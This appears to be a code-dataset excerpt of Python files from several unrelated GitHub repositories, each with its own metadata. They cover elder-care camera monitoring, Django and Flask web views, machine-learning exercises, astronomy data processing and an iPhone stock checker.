\tcv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n # \t\t\t gray)\n # \tcontinue\n\n face_location_list, names = faceutil.get_face_location_and_name(\n image)\n\n # 得到画面的四分之一位置和四分之三位置,并垂直划线\n one_fourth_image_center = (int(VIDEO_WIDTH / 4),\n int(VIDEO_HEIGHT / 4))\n three_fourth_image_center = (int(VIDEO_WIDTH / 4 * 3),\n int(VIDEO_HEIGHT / 4 * 3))\n\n cv2.line(image, (one_fourth_image_center[0], 0),\n (one_fourth_image_center[0], VIDEO_HEIGHT),\n (0, 255, 255), 1)\n cv2.line(image, (three_fourth_image_center[0], 0),\n (three_fourth_image_center[0], VIDEO_HEIGHT),\n (0, 255, 255), 1)\n\n # 处理每一张识别到的人脸\n for ((left, top, right, bottom), name) in zip(face_location_list,\n names):\n\n # 将人脸框出来\n rectangle_color = (0, 0, 255)\n if id_card_to_type[name] == 'old_people':\n rectangle_color = (0, 0, 128)\n elif id_card_to_type[name] == 'employee':\n rectangle_color = (255, 0, 0)\n elif id_card_to_type[name] == 'volunteer':\n rectangle_color = (0, 255, 0)\n else:\n pass\n cv2.rectangle(image, (left, top), (right, bottom),\n rectangle_color, 2)\n\n # 陌生人检测逻辑\n if 'Unknown' in names: # alert\n if strangers_timing == 0: # just start timing\n strangers_timing = 1\n strangers_start_time = time.time()\n else: # already started timing\n strangers_end_time = time.time()\n difference = strangers_end_time - strangers_start_time\n\n current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n\n if difference < strangers_limit_time:\n print('[INFO] %s, 房间, 陌生人仅出现 %.1f 秒. 忽略.' % (current_time, difference))\n else: # strangers appear\n event_desc = '陌生人出现!!!'\n event_location = '房间'\n print('[EVENT] %s, 房间, 陌生人出现!!!' 
% (current_time))\n cv2.imwrite(os.path.join(output_stranger_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n image) # snapshot\n pic_path = os.path.join(output_stranger_path, 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S')))\n # insert into database\n command1 = '%s inserting.py --event_desc %s --event_type 2 --event_location %s --pic_path %s' % (\n python_path, event_desc, event_location,pic_path)\n p2 = subprocess.Popen(command1, shell=True)\n\n # 开始陌生人追踪\n unknown_face_center = (int((right + left) / 2),\n int((top + bottom) / 2))\n\n cv2.circle(image, (unknown_face_center[0],\n unknown_face_center[1]), 4, (0, 255, 0), -1)\n\n direction = ''\n # face locates too left, servo need to turn right,\n # so that face turn right as well\n if unknown_face_center[0] < one_fourth_image_center[0]:\n direction = 'right'\n elif unknown_face_center[0] > three_fourth_image_center[0]:\n direction = 'left'\n\n # adjust to servo\n if direction:\n print('%d-摄像头需要 turn %s %d 度' % (counter,\n direction, ANGLE))\n\n else: # everything is ok\n strangers_timing = 0\n\n # 表情检测逻辑\n # 如果不是陌生人,且对象是老人\n if name != 'Unknown' and id_card_to_type[name] == 'old_people':\n # 表情检测逻辑\n roi = gray[top:bottom, left:right]\n roi = cv2.resize(roi, (FACIAL_EXPRESSION_TARGET_WIDTH,\n FACIAL_EXPRESSION_TARGET_HEIGHT))\n roi = roi.astype(\"float\") / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # determine facial expression\n emotions = ['Angry', 'Disgust', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\n\n emotion_value_list = facial_expression_model.predict(roi)[0]\n\n facial_expression_label = emotions[np.argmax(emotion_value_list)]\n\n if facial_expression_label == 'Happy': # alert\n if facial_expression_timing == 0: # just start timing\n facial_expression_timing = 1\n facial_expression_start_time = time.time()\n else: # already started timing\n facial_expression_end_time = time.time()\n difference = facial_expression_end_time - facial_expression_start_time\n\n current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n if difference < facial_expression_limit_time:\n print('[INFO] %s, 房间, %s仅笑了 %.1f 秒. 忽略.' % (\n current_time, id_card_to_name[name], difference))\n else: # he/she is really smiling\n event_desc = '%s正在笑' % (id_card_to_name[name])\n event_location = '房间'\n print('[EVENT] %s, 房间, %s正在笑.' 
% (current_time, id_card_to_name[name]))\n pic_path = os.path.join(output_smile_path,'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S')))\n cv2.imwrite(pic_path,image) # snapshot\n\n # insert into database\n command1 = '%s inserting.py --event_desc %s --event_type 0 --event_location %s --old_people_id %d --pic_path %s' % (\n python_path, event_desc, event_location, int(name),pic_path)\n p2 = subprocess.Popen(command1, shell=True)\n\n else: # everything is ok\n facial_expression_timing = 0\n\n else: # 如果是陌生人,则不检测表情\n facial_expression_label = ''\n\n # 人脸识别和表情识别都结束后,把表情和人名写上\n # (同时处理中文显示问题)\n img_PIL = Image.fromarray(cv2.cvtColor(image,\n cv2.COLOR_BGR2RGB))\n\n draw = ImageDraw.Draw(img_PIL)\n final_label = id_card_to_name[name] + ': ' + facial_expression_id_to_name[facial_expression_label] if facial_expression_label else id_card_to_name[name]\n draw.text((left, top - 30), final_label,\n font=ImageFont.truetype('NotoSansCJK-Black.ttc', 40),\n fill=(255, 0, 0)) # linux\n\n # 转换回OpenCV格式\n image = cv2.cvtColor(np.asarray(img_PIL), cv2.COLOR_RGB2BGR)\n\n # show our detected faces along with smiling/not smiling labels\n p.stdin.write(image.tostring())\n cv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n image)\n\n # Press 'ESC' for exiting video\n k = cv2.waitKey(1) & 0xff\n if k == 27:\n break\n\n\ndef run():\n # 使用两个线程处理\n\n thread1 = Thread(target=Video, )\n\n thread1.start()\n time.sleep(2)\n\n thread2 = Thread(target=push_frame, )\n\n thread2.start()\n\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n run()\n\n\n","repo_name":"dbylx/IntelligentCareSystem_CV","sub_path":"cv_part/camera_monitoring/tranfor.py","file_name":"tranfor.py","file_ext":"py","file_size_in_byte":13873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13789745000","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.generic import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Q\n\n\n@require_GET\ndef HomePage(request):\n category = request.GET.get(\"category\")\n if category:\n posts = Post.objects.filter(category=category)\n else:\n posts = Post.objects.all()\n \n page = request.GET.get(\"page\")\n paginator = Paginator(posts, 14) # view 16 post by page\n current_page = paginator.get_page(page)\n\n # send Showcase and Popular posts\n popular_posts = Post.objects.order_by(\"-upload_date\")[:6]\n showcase_posts = Post.objects.order_by(\"likes\")[:3]\n\n content = {\"posts\": current_page, \"popular_posts\": popular_posts, \"showcase_posts\": showcase_posts}\n return render(request, \"Main/home.html\", content)\n\n\n\nclass PostDetailPage(View):\n\n def get(self, request, slug):\n post = get_object_or_404(Post, slug=slug)\n # send Popular posts\n popular_posts = Post.objects.order_by(\"-upload_date\")[:6]\n return render(request, \"Main/post_detail.html\", {\"post\": post, \"popular_posts\": popular_posts})\n\n def post(self, request, slug):\n content = request.POST.get(\"content\")\n post = get_object_or_404(Post, slug=slug)\n if request.user.is_authenticated:\n Comment.objects.create(post=post, content=content, owner=request.user)\n else:\n 
Comment.objects.create(post=post, content=content, anonymous_name=request.POST.get(\"anonymous_name\"))\n return HttpResponse(\"Comment Created\", status=200)\n\n\n@method_decorator(login_required(login_url=\"/login/\"), name=\"dispatch\")\nclass PostUploadPage(View):\n\n def get(self, request):\n upload_form = PostUploadForm()\n return render(request, \"Main/post_upload.html\", {\"form\": upload_form})\n\n def post(self, request):\n post_form = PostUploadForm(request.POST, request.FILES)\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.owner = request.user\n post.save()\n return redirect(PostDetailPage, slug=post.slug)\n\n else:\n errors = post_form.errors\n upload_form = PostUploadForm()\n return render(request, \"Main/post_upload.html\", {\"form\": upload_form, \"errors\": errors})\n\n\n@require_GET\ndef SearchPost(request):\n query = request.GET.get(\"query\")\n posts = Post.objects.filter(Q(title__icontains=query) | Q(content__icontains=query))\n popular_posts = Post.objects.all().order_by(\"-title\")[:6]\n return render(request, \"Main/search.html\", {\"posts\": posts, \"popular_posts\": popular_posts})","repo_name":"nearFuture00/django-blog","sub_path":"Main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26477213391","text":"from flask_apispec import MethodResource\nfrom flask_apispec import doc\nfrom flask_jwt_extended import fresh_jwt_required, get_jwt_identity\nfrom flask_restful import Resource\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom db.db import DB\nfrom decorator.catch_exception import catch_exception\nfrom decorator.log_request import log_request\nfrom utils.serializer import Serializer\n\n\nclass GetMyEntityAddresses(MethodResource, Resource):\n\n def __init__(self, db: DB):\n self.db = db\n\n @log_request\n @doc(tags=['private'],\n description='Get the list of addresses of an entity assigned to the user authenticated by the token',\n responses={\n \"200\": {},\n \"422\": {\"description\": \"Object not found or you don't have the required access to it\"},\n })\n @fresh_jwt_required\n @catch_exception\n def get(self, id_):\n\n try:\n self.db.session \\\n .query(self.db.tables[\"UserEntityAssignment\"]) \\\n .with_entities(self.db.tables[\"UserEntityAssignment\"].entity_id) \\\n .filter(self.db.tables[\"UserEntityAssignment\"].user_id == int(get_jwt_identity())) \\\n .filter(self.db.tables[\"UserEntityAssignment\"].entity_id == int(id_)) \\\n .one()\n except NoResultFound:\n return \"\", \"422 Object not found or you don't have the required access to it\"\n\n data = Serializer.serialize(\n self.db.session\n .query(self.db.tables[\"EntityAddress\"])\n .filter(self.db.tables[\"EntityAddress\"].entity_id == int(id_))\n .all(),\n self.db.tables[\"EntityAddress\"]\n )\n\n return data, \"200 \"\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/resource/private/get_my_entity_addresses.py","file_name":"get_my_entity_addresses.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14186883153","text":"import Book;\nimport PythonBook;\n\nbook = Book.Book(price=15, name=\"name\", author=\"zuozhe\");\nbook.price = 20;\n\nbook.setName(\"haah\");\nbook.show();\n\n####继承\n\npythonBook = PythonBook.PythonBook(type=\"ebook\"); # 
继承了Book的构造器\npythonBook.setName(\"zhzz\")\npythonBook.showInfo()\npythonBook.doSomething()\n\n\n# 多重继承\nclass A:\n name = \"A\";\n __num = 1;\n\n def show(self):\n print(self.name);\n print(self.__num);\n\n def setNum(self, num):\n self.__num = num;\n\n\nclass B:\n nameb = \"B\";\n __numb = 2;\n\n def show(self):\n print(self.nameb);\n print(self.__numb);\n\n def setName(self, name):\n self.nameb = name;\n\n\nclass C(A, B):\n def showAll(self):\n print(self.name);\n print(self.nameb);\n\n\nC = C();\nC.showAll()\nC.show() # 由于A B都有show()方法,因此该出调用结果是根据继承顺序有关class C(B,A). 所以这一打印的是 A 1\nC.setNum(3)\nC.setName(\"zhu\");\nC.showAll()\n","repo_name":"zzzzzz5530041/python_learning","sub_path":"oop/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25549628671","text":"from math import gcd\r\n\r\ndef mmc(a, b):\r\n return a * b // gcd(a, b)\r\n#def mdc(a, b):\r\n#\treturn gcd(a, b)\r\n\r\nE = [int(x) for x in input(\"Digite duas frações que deseja somar, entre com numerador, seguido de denominador ex{num1 den1 num2 den2}:\\n\").split()]\r\nif E[1] == E[3]:\r\n\tnum = E[0]+E[2]\r\n\tden = E[1]\r\n\tr2 = gcd(num, den)\r\n\tnum /= r2\r\n\tden /= r2\r\nelse:\r\n\tr = mmc(E[1], E[3])\r\n\tE[0] = int((r/E[1])*E[0])\r\n\tE[2] = int((r/E[3])*E[2])\r\n\tnum = E[0]+E[2]\r\n\tden = r\r\n\tr2 = gcd(num, den)\r\n\tnum /= r2\r\n\tden /= r2\r\nprint(f\"A soma das frações é {int(num)}/{int(den)}\")","repo_name":"ismael1914/Testing","sub_path":"Soma de duas frações.py","file_name":"Soma de duas frações.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35420005314","text":"from flask import Blueprint, Flask\nfrom flask_restful import Api\nfrom flask_cors import CORS\n\n\nAPI_VERSION = 1\nAPI_URL_PREFIX = '/api/v%s' % API_VERSION\napi_blueprint = Blueprint('api', __name__)\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\napi = Api(\n app=api_blueprint,\n prefix = API_URL_PREFIX,\n catch_all_404s=True\n)\n\napp.config.update(\n CELERY_BROKER_URL='amqp://rabbitmq:rabbitmq@rabbitmq:5672/',\n CELERY_RESULT_BACKEND='amqp://rabbitmq:rabbitmq@rabbitmq:5672/',\n CELERYBEAT_SCHEDULER='app.tasks.sqlalchemy_scheduler:DatabaseScheduler'\n)\n\nfrom app.resources.operations import sample\n\napi.add_resource(sample, '/sample')\napp.register_blueprint(api_blueprint)\napi.init_app(app)","repo_name":"bainadeashish/sample_flask","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4932632172","text":"import matplotlib\nmatplotlib.use('qt4agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\ndef gradient_descent(X, y, theta, cost_function, alpha, iters):\n\n print(\"Running gradient descent with alpha =\", alpha, \"for\", iters, \"iterations.\")\n\n m = X.shape[0]\n cost_history = []\n theta_history = []\n\n for i in range(0, iters):\n #update theta\n theta = theta - ( (alpha/m) * (X.T * ( (X * theta) - y) ) )\n cost = cost_function(X, y, theta)\n\n #check for a janky cost\n if cost_history != [] and cost_history[-1] < cost:\n print(\"WARNING: Cost just increased, aborting gradient descent. 
Take a look at your learning rate, it may be too high.\")\n print(\"ABORTING!\")\n break\n \n '''\n #Currently not using this, but maybe in the future\n #Check for early convergence\n if cost_history != [] and cost_history[-1] - cost < 0.00001:\n print(\"Change in cost is < 1e-5, declaring convergence.\")\n print(\"Thets is:\")\n print(theta)\n break\n '''\n\n cost_history.append(cost)\n theta_history.append(theta)\n\n else:\n #create plot of cost\n fig = plt.figure()\n #ax = fig.add_subplot(1, 2, 1)\n ax = fig.add_subplot(1, 1, 1)\n x = np.arange(0, len(cost_history))\n y = cost_history\n ax.set_xlabel(\"Iteration\")\n ax.set_ylabel(\"Cost\")\n ax.set_title(\"Iterations vs Cost Function with alpha=\" + str(alpha))\n plt.plot(x, y)\n\n ''' \n #3d plot of cost function, only works with 1 feature.\n ax = fig.add_subplot(1, 2, 2, projection = '3d')\n theta_graph = [ [i[0,0], i[1,0]] for i in theta_history]\n theta_graph = np.matrix(theta_graph)\n X = theta_graph[:,0];\n Y = theta_graph[:,1];\n Z = cost_history\n\n ax.plot(X, Y, Z)\n '''\n\n plt.show()\n\n #Output some info on gradient descent\n print(\"Gradient descent completed all iterations.\")\n print(\"Last 2 costs were:\")\n print(cost_history[-2])\n print(cost_history[-1])\n print(\"Theta is:\")\n print(theta)\n\n print()\n return {\"theta\": theta,\n \"cost_history\": cost_history,\n \"theta_history\": theta_history}\n","repo_name":"colinrdavidson/Machine-Learning-with-Python","sub_path":"regression/gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30888931750","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : func_map.py\n@Time : 2019/10/13 09:39:27\n@Author : Jeffrey Wang\n@Version : 1.0\n@Contact : shwangjj@163.com\n@Desc : map函数用法示例\n\nmap(function, iterable, ...)\niterable中每个元素都应用function\n\n'''\n\nif __name__ == \"__main__\":\n m = map(lambda x: x**2, [1, 2, 3, 4])\n print(list(m))\n","repo_name":"shwdbd/python_codepool","sub_path":"src/main/python/wdbd/codepool/pycore/func_map.py","file_name":"func_map.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17792876659","text":"# File to pre-process the Input image -- read the file & determine count of distinct gray levels in an image\n\nimport cv2\nimport numpy as np\nimport sys\n\n# function to read binary file given as input\ndef ReadBin(filename , height , width):\n try:\n binfile = open ( filename , 'rb' )\n gray = np.fromfile (binfile , dtype=np.ubyte).reshape(height, width)\n return gray\n except cv2.error as e:\n print ( \"cv exception caught: {}\".format ( e ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n except ValueError as err:\n print ( \"Value error exception caught: {}\".format ( err ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n\n# function to read image\ndef ReadImage(filename , height , width):\n try:\n image = cv2.imread ( filename )\n if filename[-3:] == 'png' or filename[-3:] == 'jpg' or filename[-3:] == 'peg':\n gray = cv2.cvtColor ( image , cv2.COLOR_BGR2GRAY )\n isBin = 0\n elif filename[-3:] == 'bin':\n gray = ReadBin ( filename , height , width )\n isBin = 1\n\n return image, gray, isBin\n except cv2.error as e:\n print(\"cv exception caught: {}\".format(e))\n print(\"Exiting!!!\")\n sys.exit(1)\n except ValueError as err:\n print ( \"Value error exception caught: {}\".format 
( err ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n\n# function to count how many grayscale levels with corresponding counts.\ndef countDistinctGrayLevelsInImage(arr):\n arr = np.array(arr)\n keys = np.unique(arr)\n\n result = {}\n for key in keys:\n occurrences = np.count_nonzero ( arr == key )\n result[key] = occurrences\n\n return result\n\n","repo_name":"dmalhotra27/imageProcessing","sub_path":"preprocessingImage.py","file_name":"preprocessingImage.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11403109755","text":"import sqlite3\nimport json\nfrom dateutil.parser import parse\nimport datetime\nimport sys\n\n## Taken from stack overflow: https://stackoverflow.com/questions/55898212/user-input-from-numbered-list-and-returns-the-list/55898695\ndef display(li):\n #Iterate through the list using enumerate and print\n for idx, tables in enumerate(li):\n print(\"%s. %s\" % (idx+1, tables))\n\n\n## Modifed from stack overflow: https://stackoverflow.com/questions/55898212/user-input-from-numbered-list-and-returns-the-list/55898695\ndef get_list(li):\n choose = int(input(\"\\nSelect DSO Target:\"))-1\n #If choose is not a valid index in list, print error and return empty string\n if choose < 0 or choose > (len(li)-1):\n print('Invalid DSO selected')\n quit()\n \n #Else return chosen string\n return li[choose]\n\nconn = sqlite3.connect('astro.db')\n# https://www.devdungeon.com/content/python-sqlite3-tutorial\n# Load the contents of a database file on disk to a\n# transient copy in memory without modifying the file\nmemory_db = sqlite3.connect(':memory:')\nconn.backup(memory_db)\nconn.close()\nc = memory_db.cursor()\n# c = conn.cursor()\nc.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='astro';\")\njobs = c.fetchall()\nif len(jobs) <= 0:\n print(\"DB not generated\")\n quit()\n\nprint(\"Available DSO Targets\")\nc.execute(\"SELECT DISTINCT json_extract( data, '$.name' ) as NAME FROM astro WHERE type=?\",(\"dso\",))\nq_names = c.fetchall()\nnames = []\nfor n in q_names:\n names+=[n[0]]\ndisplay(names)\ndso = get_list(names)\n\nprint(f\"Generating CSV of View Data for {dso} will take a few minutes\")\n# print(sys.argv[1])\n\nc.execute(\"SELECT DISTINCT json_extract( data, '$.month' ) as MONTH, json_extract( data, '$.day' ) as DAY, json_extract( data, '$.year' ) as YEAR FROM astro WHERE type=?\",(\"dso\",))\ndates = c.fetchall()\nseeing_list = []\nfor date in dates:\n seeing = {\n \"day\":date[1],\n \"month\": date[0],\n \"year\": date[2],\n }\n c.execute(\"SELECT * FROM astro WHERE astro.type=? AND JSON_EXTRACT(astro.data, '$.day')=? AND JSON_EXTRACT(astro.data, '$.month')=? AND JSON_EXTRACT(astro.data, '$.year')=? 
AND JSON_EXTRACT(astro.data, '$.name')=?;\",(\"dso\",date[1],date[0],date[2], dso))\n query = c.fetchall()\n if len(query) <= 0:\n continue\n q=query[0]\n data = json.loads(q[2])\n if len(data[\"seen\"])>0:\n # print(q)\n start=None\n end=None\n g_start = None\n g_end = None\n m_time_start = None\n m_time_end = None\n m_frac_max = 0\n sorted(data[\"seen\"], key = lambda i: i['time'])\n for see in data[\"seen\"]:\n if \"sun\" in see.keys():\n if start == None and see[\"sun\"]==\"night\":\n if g_start == None and see[\"alt\"]>30:\n g_start = parse(see[\"time\"])\n start = parse(see[\"time\"])\n elif see[\"sun\"]==\"night\":\n if g_start == None and see[\"alt\"]>30:\n g_start = parse(see[\"time\"])\n elif see[\"alt\"]>30:\n g_end = parse(see[\"time\"])\n end = parse(see[\"time\"])\n c.execute(\"SELECT * FROM astro WHERE astro.type=? AND JSON_EXTRACT(astro.data, '$.time')=?;\",(\"moon\",see[\"time\"]))\n m_query = c.fetchall()\n # print(m_query)\n if len(m_query) > 0:\n m_q = m_query[0]\n m_data = json.loads(m_q[2])\n if m_time_start == None and m_data[\"moonalt\"] > 0:\n m_time_start = parse(m_data[\"time\"])\n if m_frac_max == None:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_frac_max < m_data[\"moonfrac\"]:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_data[\"moonalt\"] > 0:\n m_time_end = parse(m_data[\"time\"])\n if m_frac_max == None:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_frac_max < m_data[\"moonfrac\"]:\n m_frac_max = m_data[\"moonfrac\"]\n if start != None and end != None:\n if g_start != None and g_end != None:\n seeing[\"g_time\"] = g_end-g_start\n else:\n seeing[\"g_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"v_time\"] = end-start\n else:\n seeing[\"g_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"v_time\"] = datetime.timedelta(0, 0, 0)\n if m_time_start != None and m_time_end != None:\n seeing[\"m_time\"] = m_time_end - m_time_start\n seeing[\"m_frac\"] = m_frac_max\n else:\n seeing[\"m_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"m_frac\"] = m_frac_max\n seeing_list+=[seeing]\n\nprint(f\"Writing View Data to {dso}.csv\")\nf = open(dso+\".csv\",\"w+\")\nf.write(\"{}/{}/{}, {}, {}, {}, {}\\n\".format(\n \"month\",\n \"day\",\n \"year\",\n \"Time Visible\",\n \"Time Visible above 30 degrees\",\n \"Time Moon is above horizon\",\n \"Max Visible Moon Fraction\"))\nfor seeing in seeing_list:\n if seeing[\"v_time\"].total_seconds() > 0:\n f.write(\"{}/{}/{}, {}, {}, {}, {}\\n\".format(\n seeing[\"month\"],\n seeing[\"day\"],\n seeing[\"year\"],\n seeing[\"v_time\"],\n seeing[\"g_time\"],\n seeing[\"m_time\"],\n seeing[\"m_frac\"]))\nf.close()\n\n","repo_name":"javawolfpack/Astro-Target","sub_path":"csv_data.py","file_name":"csv_data.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13041973332","text":"import random\nimport string\n\nimport pika\nimport pytest\nimport timeout_decorator\n\n\n@timeout_decorator.timeout(5)\n@pytest.mark.parametrize(\"host,port\", [\n (\"rabbitmqdb\", 5672), # Test direct connection\n (\"linkerdtcp\", 7401) # Test via linkerd-tcp\n])\ndef test_connection(host, port):\n queue = \"\".join(random.choices(string.ascii_lowercase, k=5))\n\n connection = pika.BlockingConnection(pika.ConnectionParameters(host, port))\n channel = connection.channel()\n channel.queue_declare(queue=queue)\n channel.basic_publish(\n exchange=\"\",\n routing_key=\"hello\",\n body=\"Hello World!\"\n )\n 
connection.close()\n","repo_name":"ajagnanan/servicediscovery","sub_path":"apps/tests/linkerdtcp/test_rabbitmq.py","file_name":"test_rabbitmq.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28665818914","text":"from django.shortcuts import render, redirect\nfrom .forms import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n@login_required\ndef registrar_recurso(request):\n usuario = request.user\n if usuario.is_staff:\n if request.method == 'POST':\n form = registro_recurso(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Recurso registrado exitosamente')\n return render(request, 'recursos/registro_recurso.html', {'form': registro_recurso()})\n else:\n messages.error(request, 'Por favor corrige los errores')\n return render(request, 'recursos/registro_recurso.html', {'form':form})\n else:\n form = registro_recurso()\n return render(request, 'recursos/registro_recurso.html', {'form':form})\n else:\n messages.error(request, 'No estas autorizado para realizar esta acción')\n return redirect('accounts:home')\n\n# Listar recursos\ndef listar_recursos():\n recursos = Recurso.listar_recursos()\n return recursos\n\ndef consultar_recursos(request):\n return render(request, 'recursos/listar_recursos.html', {'recursos': listar_recursos})\n\n\n#Editar recurso\n@login_required\ndef editar_recurso(request, id_recurso):\n recurso = Recurso.get_recurso(id_recurso)\n usuario = request.user\n if usuario.is_staff:\n if request.method == 'POST':\n form = registro_recurso(request.POST, instance=recurso)\n if form.is_valid():\n form.save()\n messages.success(request, 'Recurso modificado exitosamente')\n return redirect('recursos:consultar_recursos')\n else:\n messages.error(request, 'Por favor corrige los errores')\n return render(request, 'recursos/editar_recurso.html', {'form':form})\n else:\n form = registro_recurso(instance=recurso)\n return render(request, 'recursos/editar_recurso.html', {'form':form})\n else:\n messages.error(request, 'No estas autorizado para realizar esta acción')\n return redirect('accounts:home')\n","repo_name":"luishgranja/reservapp","sub_path":"apps/recursos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1885806266","text":"\nimport os\nimport nibabel as nib\n\nfilenames=[]\nunsupervised_data_dir='/shared/mrfil-data/cddunca2/Task01_BrainTumour/imagesTr'\nfor (dirpath, dirnames, files) in os.walk(unsupervised_data_dir):\n filenames += [os.path.join(dirpath, file) for file in files if '.nii.gz' in file ]\n\nout_dir ='/shared/mrfil-data/cddunca2/Task01_BrainTumour/partitioned-by-mode'\nfor decath_file in filenames:\n patient = decath_file.split('/')[-1].split('.')[0]\n image = nib.load(decath_file)\n image_tns = image.get_fdata()\n orig_header = image.header\n aff = orig_header.get_qform()\n # flair t1 t1ce t2 \n modes = [\"flair.nii.gz\", \"t1.nii.gz\", \"t1ce.nii.gz\", \"t2.nii.gz\"]\n for i, mode in enumerate(modes):\n img_mat = image_tns[:, :, :, i]\n img = nib.Nifti1Image(img_mat, aff, header=orig_header)\n os.makedirs(f'{out_dir}/{patient}', exist_ok=True)\n img.to_filename(os.path.join(out_dir, 
f'{patient}/{patient}_{mode}'))\n\n\n","repo_name":"ChaseDuncan/brats2020","sub_path":"scripts/decathlon_decompress.py","file_name":"decathlon_decompress.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15089824778","text":"#!/usr/bin/python\n\n'''iPhone Availability Checker\nThis tiny script checks if certain iPhone models are available for pickup in the\nApple stores of your choice (as long as they are in the same country). If the\nmodels of your choice are available the script will send you an email. By\nsetting up a cronjob, you can be immediately alerted once the iPhone is\navailable.\n\nYou will need to customize the script to your needs. I.e. county, iPhone model,\nstore etc.\n'''\n\nimport requests\nimport json\nimport smtplib\n\n#######################\n# Begin customization #\n#######################\n\n# The country of the Apple store you are looking to pickup the phone from.\ncountry = 'UK'\n\n# The IDs of the Apple stores you are looking to pickup the phone from.\n# You can find the ID of the Apple store by viewing the source of the store\n# homepage. In the meta-tag you'll see the ID starting with R.\nstores = ['R245', # Covent Garden\n 'R092', # Regent Street\n 'R369'\n ]\n\n# Finding the ID of the model you are looking for is a bit harder. Apple has\n# different IDs for each model in each country. So doublecheck that you have\n# picked the correct ID.\nmodels = ['MN4P2B/A', # iPhone 7+ Silver 128 GB (UK)\n 'MN5F2LL/A', # iPhone 7+ JetBlack 256 GB (US-AT&T)\n 'MN912VC/A',\n 'MN972VC/A']\n\n# Add here the email addresses that you want to inform about the availablility.\nreceipients = ['some@email.me']\n\n# Your gmail address. The availability notification will be send from this\n# account.\nsender = 'some@gmail.com'\n\n# The password of the gmail account.\nsender_passwd = ''\n\n#####################\n# End customization #\n#####################\ncountry_codes = {'AE': ['AE', 'en_AE'],\n 'AU': ['AU', 'en_AU'],\n 'CA': ['CA', 'en_CA'],\n 'CH': ['CH', 'de_CH'],\n 'CN': ['CN', 'en_CN'],\n 'DE': ['DE', 'de_DE'],\n 'ES': ['ES', 'es_ES'],\n 'FR': ['FR', 'fr_FR'],\n 'IT': ['IT', 'it_IT'],\n 'JP': ['JP', 'jp_JP'],\n 'SE': ['SE', 'se_SE'],\n 'TR': ['TR', 'tr_TR'],\n 'UK': ['GB', 'en_GB'],\n 'US': ['US', 'en_US']}\n\nurl = 'https://reserve.cdn-apple.com/{0}/{1}/reserve/iPhone/availability.json'\n\ndef getCurrentStockData():\n '''Loads Apple's current iPhone stock.\n\n Returns:\n A dict with the choosen stores and with these stores' current stock. 
